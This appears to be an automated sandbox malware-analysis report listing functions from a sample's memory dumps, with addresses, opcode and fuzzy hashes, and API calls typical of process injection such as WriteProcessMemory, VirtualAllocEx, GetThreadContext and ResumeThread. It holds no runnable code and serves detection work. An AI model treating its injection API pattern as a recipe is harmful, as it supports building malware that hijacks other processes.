Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c03e7166bb0bab9f020817fd360ac28861ac4b8d0e4990d47a97faa6fc8a2d9c
Instruction ID: 82599b8d1145e89ba75e7d3be53bf9deef6eba3f03edf311af8f6e0038b70336
Opcode Fuzzy Hash: c03e7166bb0bab9f020817fd360ac28861ac4b8d0e4990d47a97faa6fc8a2d9c
Instruction Fuzzy Hash: 4831F871E006188FEB18CFAAD9407DEBBF7AFC9200F14C4AAD908BB254DB3459458F61

Uniqueness

Uniqueness Score: -1.00%

Function 00DD37E0, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f6183a81f9f8f2f1c342b7a2fa003125801a528286d7dbab818b34074d1eac3
Instruction ID: 68d1bb3d14c472dbc2238602369a60949510859da12a37bd84f33e4d526982fe
Opcode Fuzzy Hash: 8f6183a81f9f8f2f1c342b7a2fa003125801a528286d7dbab818b34074d1eac3
Instruction Fuzzy Hash: E131F875E057188FDB18CFAAD9446CEBBB2EF89300F14C0AAD409AB364DB359A45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 054EA3E3, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eda3f67ad18d5d1086b0c8c0de80d8ad1c87ea66a762c4b6154aa2fe23fb991
Instruction ID: d592876cc8d60a5970fd5a8fb0b121f8865bc7b840b1d5b00efe1df801fd6439
Opcode Fuzzy Hash: 9eda3f67ad18d5d1086b0c8c0de80d8ad1c87ea66a762c4b6154aa2fe23fb991
Instruction Fuzzy Hash: 2A31F5B5E006188BEB18CFAAD9453DEFBF3AFC8311F14C06AD809AA254DB341A45CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05C6732C, Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C675FF

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 313efbaf85f81e923a311ecba9646660933e305169d6e6609ddffe27fe7eb246
Instruction ID: 0f60fefcd7243838df5f56277ea12eefa00cd2b636a90c795f8b69a02c4c837b
Opcode Fuzzy Hash: 313efbaf85f81e923a311ecba9646660933e305169d6e6609ddffe27fe7eb246
Instruction Fuzzy Hash: 0CC11371D002298FDF20CFA8C884BEDBBB1FB49308F0499A9D559B7240DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05C67338, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C675FF

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 36075fc3b7a9b85165c450825234f4147263d3f04288b2bb09518e3e1e9b7e06
Instruction ID: b1d2b292d033df12e6cf057c884ba0229694256991596ebb421e8d14349c0252
Opcode Fuzzy Hash: 36075fc3b7a9b85165c450825234f4147263d3f04288b2bb09518e3e1e9b7e06
Instruction Fuzzy Hash: DFC10371D002298FDF21CFA8C884BEDBBB1FB49318F0099A9D559B7240DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05C66900, Relevance: 1.6, APIs: 1, Instructions: 133injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C669DB

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1ea4a821c83598f65e707ecee995f51a96a79b8a0b32c6b192d6f6a11aaf0047
Instruction ID: 534e71d37076d493ef80c7ef510f16a873989423cb08ab026f2ca9f66fbc737e
Opcode Fuzzy Hash: 1ea4a821c83598f65e707ecee995f51a96a79b8a0b32c6b192d6f6a11aaf0047
Instruction Fuzzy Hash: 3A41CCB5D052489FCF00CFA9D980AEEBBF5BB09314F14942AE855BB250D734AA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00DDFD80, Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00DDFE71

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 95304d06eeeee449b8d1fb250bcb9e42312d181431b422e2665ec581be1b2d19
Instruction ID: 3072365592cb211ba2c0570f168a24c51e08a2320752323b5f1aa11bbac2482f
Opcode Fuzzy Hash: 95304d06eeeee449b8d1fb250bcb9e42312d181431b422e2665ec581be1b2d19
Instruction Fuzzy Hash: 6551D575D0421C8FDB20DFA8C844BCEBBB5BF49304F1084AAD549AB251DB756E89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05C66908, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C669DB

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: defffffbe694c86a0d7fbd5c826d114c9c20d25d7dcf4a6cfd14806aafb18562
Instruction ID: de5913fa6c331a15c51d30fdee357a287752eee49ce3d2956370b71bcaa09bb4
Opcode Fuzzy Hash: defffffbe694c86a0d7fbd5c826d114c9c20d25d7dcf4a6cfd14806aafb18562
Instruction Fuzzy Hash: F941BAB4D012589FCF00CFA9D984AEEFBF1BB49314F14942AE815BB240D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05C66A5B, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C66B12

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4e56835011bd4411f8021ea812fac79cbe85c2a936a0a87da04b44152609d430
Instruction ID: 32fc4f3b389be18c972a9b3bf801f3c6ef00f6ee6bf05f8d2604beb6a0eb74a4
Opcode Fuzzy Hash: 4e56835011bd4411f8021ea812fac79cbe85c2a936a0a87da04b44152609d430
Instruction Fuzzy Hash: D341B6B4D04258DFCF00CFAAD880AEEFBB1BB49314F14942AE815B7200DB35AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05C66A60, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C66B12

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ce14caf3eb6747cecc184798893aaadd33cc950e5b7133f077b3c41461fca25f
Instruction ID: 5e9c24c6aac3c5d861d7459a3796f1705883ddffb03add7cc34f138687edc14a
Opcode Fuzzy Hash: ce14caf3eb6747cecc184798893aaadd33cc950e5b7133f077b3c41461fca25f
Instruction Fuzzy Hash: 044195B4D042589FCF00CFAAD880AEEFBB5BB49314F14942AE815B7240DB75AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05C667E0, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C66892

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de8734df6d5e67192f89f150112a2077da20f08da4a7751d8456c6c085b8d220
Instruction ID: 983fb25807bdc27d1092bcc4affd4baa12c59ceaf56b4195f9a0763e822aceea
Opcode Fuzzy Hash: de8734df6d5e67192f89f150112a2077da20f08da4a7751d8456c6c085b8d220
Instruction Fuzzy Hash: 5131B5B8D042489FCF00CFA9D880ADEBBB1BF49310F10942AE815BB210D735A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05C667E8, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C66892

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e39ca49f0fef0dff97943bbfc0f6b35d43a4a37bcf47a22080e7d7a0fba5d8af
Instruction ID: b7242d8c48e1bb7c121b80ae1e4d1f5ddb875d85b86915697e2223cad4b3e1b2
Opcode Fuzzy Hash: e39ca49f0fef0dff97943bbfc0f6b35d43a4a37bcf47a22080e7d7a0fba5d8af
Instruction Fuzzy Hash: A83186B8D042589FCF10CFA9D980ADEFBB5BB49314F10942AE815BB210D735A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DD1800, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00DD18AF

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bb093b5e29404f5b173f774810be8aeab2f886f0a8fcbf6f9812eb5af8cba0ed
Instruction ID: f46eed1b70d72b114c1f621e13996f996c5a49c6be765aa2eaa35b71c333a0db
Opcode Fuzzy Hash: bb093b5e29404f5b173f774810be8aeab2f886f0a8fcbf6f9812eb5af8cba0ed
Instruction Fuzzy Hash: E631A8B9D04258AFCF10CFA9D984AEEFBB1BB19310F24906AE814B7350D774A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05C666B8, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 05C6676F

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: cdbe94c1cc3a68e2057dddc094dc60fa33f8204411436ae8e11abadd373c54d1
Instruction ID: 66f55902ea6e6c5b2ba16d6047ce87b595371da62ccf57eb67c5bb627ad80304
Opcode Fuzzy Hash: cdbe94c1cc3a68e2057dddc094dc60fa33f8204411436ae8e11abadd373c54d1
Instruction Fuzzy Hash: E541BBB5D052589FCF10CFA9D884AEEBBF1BF49314F14842AE415B7240D738AA89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00DD1808, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00DD18AF

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 68bdbb32fa6edc4000ca3337a7f0d90c774710a7845d3249caa8426a63ccb2b4
Instruction ID: 76e2facd7a79b398d9bc38b03713964b74bd11029983b438b947e272d2e331f8
Opcode Fuzzy Hash: 68bdbb32fa6edc4000ca3337a7f0d90c774710a7845d3249caa8426a63ccb2b4
Instruction Fuzzy Hash: AF3197B9D04258AFCB10CFA9D984ADEFBF1BB19310F14902AE814B7310D774A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DD9E30, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00DD9ED7

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e4ce9c91a0437aa1678bc210f76f18e891cbe4baa634cb91aa7d704eba5cb2f6
Instruction ID: 08c16a69205706c5331d5cb6c85d44fdf4087b0c5f5cf9ddd25dfb9419f178b9
Opcode Fuzzy Hash: e4ce9c91a0437aa1678bc210f76f18e891cbe4baa634cb91aa7d704eba5cb2f6
Instruction Fuzzy Hash: 2A3195B9D052589FCB10CFA9E984AEEFBB1BB09310F14902AE814B7310D775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05C666C0, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 05C6676F

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 36efb3e90af673ae6c31dd9a537ee979cb9412c5f8e0a4367a7e1c3c96773534
Instruction ID: 9c0f199e0a784bbdd65528416a889be1cd120afaf9fcd420e731d29ce027a28b
Opcode Fuzzy Hash: 36efb3e90af673ae6c31dd9a537ee979cb9412c5f8e0a4367a7e1c3c96773534
Instruction Fuzzy Hash: F331ABB4D052589FCB10CFA9D884AEEFBF1BF49314F14842AE415B7240D739AA89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05C6657B, Relevance: 1.6, APIs: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 05C6664E

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0587ba2b19981de743a9fcc16a0b39a1aa276dd0be928246ef5b5976542d9295
Instruction ID: db1303904079630094f8b6ade96973242768d3335fb9d5af82472e40f96b9a27
Opcode Fuzzy Hash: 0587ba2b19981de743a9fcc16a0b39a1aa276dd0be928246ef5b5976542d9295
Instruction Fuzzy Hash: 6F31BCB4D052089FDB04DFA9E981AEEBBF1BB48304F14846AE519B3340DB35AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 05C6A700, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05C6A79B

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2d52b198f65fc7b7e233412018f9d0b67285ce046e33bf62df8fc9c802e8f9ea
Instruction ID: 2e9e54aefbc68e3d4f9370199a065f5a43eac5194aa2f5e4caafdc2caa167cb5
Opcode Fuzzy Hash: 2d52b198f65fc7b7e233412018f9d0b67285ce046e33bf62df8fc9c802e8f9ea
Instruction Fuzzy Hash: 733186B8D002489FCB10CFA9D984A9EFBF5AB09310F14901AE814B7310D335A9458F65

Uniqueness

Uniqueness Score: -1.00%

Function 00DD03E8, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 00DDBE22

Memory Dump Source

Source File: 00000000.00000002.345554013.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 967219872d3b65bd859b34b6d6f9842a0da5017eda9fe344759e473534fd5374
Instruction ID: c09b97b25eaa876e0ee27718e3b42c02bf1eff70d5351b58ae80cf36d7c0564b
Opcode Fuzzy Hash: 967219872d3b65bd859b34b6d6f9842a0da5017eda9fe344759e473534fd5374
Instruction Fuzzy Hash: 1C31A7B4D04248DFCB10CFA9D584AEEFBF5AB49324F14806AE918B7320D734A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C665CB, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 05C6664E

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3722a0b250c446664c49c9d7809f381b76ee00762dc669dee57a30280f47085f
Instruction ID: aae9d68126fda3718a97cb859ecd73b321c6697b8346f30e862137526f233448
Opcode Fuzzy Hash: 3722a0b250c446664c49c9d7809f381b76ee00762dc669dee57a30280f47085f
Instruction Fuzzy Hash: 4331C9B4D012589FCF10CFA9E984AEEFBB5AF49314F14842AE815B7300DB35A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05C665D0, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 05C6664E

Memory Dump Source

Source File: 00000000.00000002.349310195.0000000005C60000.00000040.00000001.sdmp, Offset: 05C60000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fcdcf7f4f09c1f5c26910ebfa8f0c32a05082f5ebc8021ddfd550c699278365b
Instruction ID: b584275b77245e88e394654270e58f3149b5e5cca4e4afb155b8c5b33df5bf82
Opcode Fuzzy Hash: fcdcf7f4f09c1f5c26910ebfa8f0c32a05082f5ebc8021ddfd550c699278365b
Instruction Fuzzy Hash: 1B31C9B4D012189FCF10CFA9E980AEEFBB5AF49314F14842AE815B7300DB35A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 054E1B30, Relevance: .7, Instructions: 688COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6334a226d16cc8f7d1927132859a2cb1c2f294eb12ebeac35dadcf922d2fe6e1
Instruction ID: f32abdfa24a0dbffbcfc9fc08da1b92adffb81d0b6e6a0266b0558800e19d787
Opcode Fuzzy Hash: 6334a226d16cc8f7d1927132859a2cb1c2f294eb12ebeac35dadcf922d2fe6e1
Instruction Fuzzy Hash: 69527F34A0411C8FEB24DBA4C950BEEBBB6EF84304F1084AAE5066B794DF749E45DF61

Uniqueness

Uniqueness Score: -1.00%

Function 054E0DA0, Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682303d8d9c17d7f42b22591177c0ed80bdbe7eaa4a3037765b12a3d2167e494
Instruction ID: e43188d6da75cf98a34034e673831e70f5fbb7d61911991f7836bd75b43b21a2
Opcode Fuzzy Hash: 682303d8d9c17d7f42b22591177c0ed80bdbe7eaa4a3037765b12a3d2167e494
Instruction Fuzzy Hash: 21424930A442498FCB24CF69D884AEEBBF2BF49316F1545AAE816DB361D770ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054E4B60, Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c2c4804098e3ce3758aab0bdaa8c7505855528ab2fc58afcf605e1d8ddf48e
Instruction ID: c5952abe80c03aaffddf0dded77c33aee376ab9af1ac4e24abeabff9f0678693
Opcode Fuzzy Hash: 40c2c4804098e3ce3758aab0bdaa8c7505855528ab2fc58afcf605e1d8ddf48e
Instruction Fuzzy Hash: 5CF11E75A046148FCB14CF6CC988EEEB7F6BF88711B1680AAE515AB365CB30EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054E0D91, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5c8d2a13fafaa604b4fc408757809e2f2e1c2d24f92c855746e9575ec6843b
Instruction ID: 079aa756c918c1d05ca1840ca00ee3182f14bd434ab7e93b19d9704ea4dcd7cb
Opcode Fuzzy Hash: 5d5c8d2a13fafaa604b4fc408757809e2f2e1c2d24f92c855746e9575ec6843b
Instruction Fuzzy Hash: BEC14A30A042489FCB14CF69C984AEEBBF2FF48306F15859AE859AB761D771ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054E49A8, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3027cfa698d59e21ec7bac9f5202964c3f997f1a8ffc338ee044132987e08ad9
Instruction ID: ac2528fdbca9516e873e7eb1d4f6f9c461d356bbb2dfee00e60eabd00e11c12b
Opcode Fuzzy Hash: 3027cfa698d59e21ec7bac9f5202964c3f997f1a8ffc338ee044132987e08ad9
Instruction Fuzzy Hash: 3A41D2357042048FCB18DBA9D858AAE7BB7EFC9215F1444AAE606DB791CF31DC12C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 054E3D9B, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20327432f6bbea5026be4ad51768d26058ed996c6ed45e63bf508e2ba949549a
Instruction ID: f5b44b25911d6b67b6792c22035e80fc2df27fc9d7960b175e5e9a599779f405
Opcode Fuzzy Hash: 20327432f6bbea5026be4ad51768d26058ed996c6ed45e63bf508e2ba949549a
Instruction Fuzzy Hash: 70417F31A04209DFCF16CFA8C844BEEBBB2FF45311F048596E815AB295D331E955CB94

Uniqueness

Uniqueness Score: -1.00%

Function 054E1609, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 291d7b5d6941ecfffaaa65b6c5c3155190d618a7e357eebefd586b8c09d22882
Instruction ID: 34cb1407d119c46e660270897618d8bef55f25dab98eca7a71a478245add60cf
Opcode Fuzzy Hash: 291d7b5d6941ecfffaaa65b6c5c3155190d618a7e357eebefd586b8c09d22882
Instruction Fuzzy Hash: FC21B0307442044BCB246779D894AFF36ABBF81556B1850BBE902CB791EF35CC52D751

Uniqueness

Uniqueness Score: -1.00%

Function 054E8400, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f864ad9fc2c30f715e7b57ceccedc7e371e70edc5df0d8aac5901c29bc907c
Instruction ID: d2de0abbd230ef2946abd8d2bfbf5689f63766cfce425cac4248393ecef8522d
Opcode Fuzzy Hash: 19f864ad9fc2c30f715e7b57ceccedc7e371e70edc5df0d8aac5901c29bc907c
Instruction Fuzzy Hash: 3D21D1303442042BEB28AA295C59FBF255BEBC4765F248429F60AEF3C0DE709C0253A5

Uniqueness

Uniqueness Score: -1.00%

Function 054E1618, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d652ca95d9a05fe1cf981bacfe46b7376c2a1a47e072c056c031e22b328557ed
Instruction ID: 51cbeeaf8d5242e1dd16bf8dd80b6a615cbcd9ca34378d64db46afd09c25f05a
Opcode Fuzzy Hash: d652ca95d9a05fe1cf981bacfe46b7376c2a1a47e072c056c031e22b328557ed
Instruction Fuzzy Hash: AD21C5303442044BDB256739D894AFF369BAFC5656F28507AD502CF794DE39CC92D351

Uniqueness

Uniqueness Score: -1.00%

Function 054E4B50, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9256ea1619798e85b06621c912d70599c8796272c74216a35f4d9a6c641f4b2
Instruction ID: bc0fa1e1eea7956f30d75e8614ca0bc3f2e4765b23397df2354ea0db079c741c
Opcode Fuzzy Hash: b9256ea1619798e85b06621c912d70599c8796272c74216a35f4d9a6c641f4b2
Instruction Fuzzy Hash: 9F316171F006058FCB04DF6CC884AAEB7B2FF84311B16815AE525AB3A5CB74DD52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 054E9BF0, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ae1ad4c08eb2be178588a188f5e8c7a8ee8d47e9654fe2515daab4d9ffd512
Instruction ID: 7e96e717d5ab056bde832377eb3982c78fdc78606e9dadd14e015291840dd48c
Opcode Fuzzy Hash: a0ae1ad4c08eb2be178588a188f5e8c7a8ee8d47e9654fe2515daab4d9ffd512
Instruction Fuzzy Hash: 8D3115B4E042099FCB44CFA9C4809EEBBF2AF89304F5484AAD815A7395D735AA42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054E9C00, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dba32c6f4d0a9ebd0cbcd05fc3d6b2a4d8dc703c358a8e9422d43dc78ae6f11
Instruction ID: ca0fdbce71c7176674318472074a28a2d6d1b47153cfa6a3c18852b09008e0cd
Opcode Fuzzy Hash: 9dba32c6f4d0a9ebd0cbcd05fc3d6b2a4d8dc703c358a8e9422d43dc78ae6f11
Instruction Fuzzy Hash: 7731C4B4E05209DFCB44DFA9C581AEEBBF2FB88301F5084AAD819A7354D7749A42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054E83F3, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878e36d5fde83a92b65b0cef01523ba3b076f91801499fe12bafa73839bb855f
Instruction ID: 6f46c9708ffda95cb05b501037655b7b63afde1369fcb56784f736fa64634684
Opcode Fuzzy Hash: 878e36d5fde83a92b65b0cef01523ba3b076f91801499fe12bafa73839bb855f
Instruction Fuzzy Hash: 3711E2343082002FEB29A6785C55BBF2697EBC9355F258879E20ADF3C1DE359C034366

Uniqueness

Uniqueness Score: -1.00%

Function 054E9D11, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0637bddd50936ef423c6a550662bccc9e3c99cfecea697c3d9397602c1ee215
Instruction ID: 3690d202f98e33cabe25bc513beb96a900a9ca962c42682b138ff7beac6ef0b8
Opcode Fuzzy Hash: c0637bddd50936ef423c6a550662bccc9e3c99cfecea697c3d9397602c1ee215
Instruction Fuzzy Hash: 40311AB4E04219DFCB04CFA9C581AAEBBF2EB88301F2484A6C518A7354D7309A41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D4D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345435573.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c942e85084e68015021179be3865e28ed144c5ba759898e65354130a708fb35
Instruction ID: 7ee99aa33dff34be90389e768de1a19c4687e76fab45dafeeead02a8ae3e5372
Opcode Fuzzy Hash: 6c942e85084e68015021179be3865e28ed144c5ba759898e65354130a708fb35
Instruction Fuzzy Hash: 4E21F271504240DFCB14DF64D9C4B16BBA6FB88324F24C9A9E8494B246C73AD847CA71

Uniqueness

Uniqueness Score: -1.00%

Function 054EB8C9, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348907392.00000000054E0000.00000040.00000001.sdmp, Offset: 054E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6b9ab74f8f32242547efd0fd0f52c183ad25321951ad530b244994da952c17
Instruction ID: ca0996009dd705d9358a78a75f2713e8671917b02b255734ed65613629af9e6c
